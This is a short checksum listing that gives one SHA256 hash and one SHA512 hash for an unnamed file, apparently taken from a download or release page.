SHA256bae0e53bb062c9e5a8411c690f4b485d70655991195cb2bec5810a8e813a1581
SHA512029feda70d9b84ee96bbecc11bc2bb6902082abe6f5c9e99852889a995421df739231a2b72d13bfabde359ad01c4cecd04deb1f18f78ab14ad82bc5b80bf97b2